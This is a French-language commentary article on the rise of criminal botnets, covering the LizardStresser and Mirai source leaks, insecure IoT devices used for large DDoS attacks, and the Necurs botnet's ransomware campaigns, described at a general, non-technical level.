Un facteur important qui contribue aujourd’hui à la popularité des botnets parmi les cybercriminels est la relative facilité avec laquelle les différents composants des botnets malveillants peuvent être assemblés, échangés et améliorés. L'opportunité de créer rapidement un botnet est apparue en 2015, lorsque les codes sources de LizardStresser, un outil permettant de mener des attaques DDoS créé par le célèbre groupe de hackers Lizard Squad, sont devenus accessibles au public. Aujourd’hui, n’importe quel écolier peut télécharger un botnet pour mener des attaques DDOS (ce qu’il fait déjà, comme l’écrivent les médias du monde entier).

Facilement téléchargeable et facile à utiliser, le code LizardStresser contient des méthodes sophistiquées pour effectuer des attaques DDoS : maintenir les connexions TCP ouvertes, envoyer des chaînes aléatoires avec des caractères inutiles à un port TCP ou un port UDP, ou renvoyer des paquets TCP avec des valeurs d'indicateur spécifiées. Le malware incluait également un mécanisme permettant d'exécuter des commandes shell de manière aléatoire, ce qui est extrêmement utile pour télécharger des versions mises à jour de LizardStresser avec de nouvelles commandes et une liste mise à jour des appareils contrôlés, ainsi que pour installer d'autres logiciels malveillants sur l'appareil infecté. Depuis lors, les codes sources d'autres logiciels malveillants conçus pour organiser et contrôler les botnets ont été publiés, notamment le logiciel Mirai, qui a considérablement réduit la « barrière high-tech » au lancement d'activités criminelles et, en même temps, des opportunités accrues de profit et une flexibilité dans l’utilisation des botnets.

Comment l’Internet des objets (IoT) est devenu un véritable klondike pour la création de botnets

En termes de nombre d’appareils infectés et de trafic qu’ils génèrent lors des attaques, l’utilisation massive d’appareils IoT non protégés a eu un effet explosif, conduisant à l’émergence de botnets d’une ampleur sans précédent. Par exemple, à l'été 2016, avant et immédiatement pendant les Jeux Olympiques de Rio de Janeiro, l'un des botnets, créé sur la base du code du programme LizardStresser, a principalement utilisé environ 10 000 appareils IoT infectés (principalement des caméras Web) pour effectuer attaques DDoS multiples et de longue durée avec une capacité soutenue de plus de 400 Gbit/s, atteignant une valeur de 540 Gbit/s lors de son pic. Nous notons également que, selon les estimations, le botnet Mirai d'origine aurait pu compromettre environ 500 000 appareils IoT dans le monde.

Bien que de nombreux fabricants aient apporté quelques modifications à la suite de telles attaques, la plupart des appareils IoT sont toujours dotés d'un nom d'utilisateur et d'un mot de passe définis en usine ou présentent des vulnérabilités de sécurité connues. De plus, pour économiser du temps et de l'argent, certains fabricants dupliquent périodiquement le matériel et les logiciels utilisés pour différentes classes d'appareils. En conséquence, les mots de passe par défaut utilisés pour contrôler l’appareil d’origine peuvent être appliqués à de nombreux appareils complètement différents. Ainsi, des milliards d’appareils IoT non sécurisés sont déjà déployés. Et, même si la croissance prévue de leur nombre a ralenti (quoique légèrement), l’augmentation attendue du parc mondial d’appareils IoT « potentiellement dangereux » dans un avenir proche est choquante (voir graphique ci-dessous).

De nombreux appareils IoT sont bien adaptés à une utilisation non autorisée dans les botnets criminels car :

  • La plupart d’entre eux ne sont pas gérés, c’est-à-dire qu’ils fonctionnent sans contrôle approprié de la part de l’administrateur système, ce qui rend leur utilisation en tant que proxy anonymes extrêmement efficace.
  • Ils sont généralement en ligne 24h/24 et 7j/7, ce qui signifie qu'ils sont disponibles pour des attaques à tout moment et, en règle générale, sans aucune restriction de bande passante ni filtrage du trafic.
  • Ils utilisent souvent une version allégée du système d'exploitation basée sur la famille Linux. Et les logiciels malveillants de type botnet peuvent être facilement compilés pour des architectures largement utilisées, principalement ARM/MIPS/x86.
  • Un système d'exploitation allégé signifie automatiquement moins de fonctionnalités de sécurité, y compris la création de rapports, de sorte que la plupart des menaces ne sont pas détectées par les propriétaires de ces appareils.

Voici un autre exemple récent qui vous aidera à comprendre le pouvoir que peuvent avoir les infrastructures modernes de botnets criminels : en novembre 2017, le botnet Necurs a distribué une nouvelle souche du virus ransomware Scarab. En conséquence, environ 12,5 millions d'e-mails infectés ont été envoyés à la campagne de masse, c'est-à-dire que le taux de distribution était supérieur à 2 millions d'e-mails par heure. À propos, le même botnet a été observé distribuant les chevaux de Troie bancaires Dridex et Trickbot, ainsi que les virus ransomware Locky et Jans.

Conclusions

L'environnement favorable aux cybercriminels ces dernières années en raison de la haute disponibilité et de la facilité d'utilisation de logiciels malveillants de type botnet plus sophistiqués et flexibles, associé à l'augmentation significative du nombre d'appareils IoT non protégés, a fait des botnets criminels un élément majeur de l'underground numérique croissant. économie. Cette économie dispose de marchés pour vendre des données obtenues illégalement, mener des actions malveillantes contre des cibles spécifiques dans le cadre de la fourniture de services contre rémunération, et même pour sa propre monnaie. Et toutes les prévisions des analystes et des spécialistes de la sécurité semblent extrêmement décevantes : dans un avenir proche, la situation de l'utilisation abusive des botnets pour obtenir des profits illégaux ne fera qu'empirer.

Paranoïaque éternel, Anton Kochukov.


Voir aussi :

Des questions ?

Signaler une faute de frappe

Texte qui sera envoyé à nos rédacteurs :

Envoyer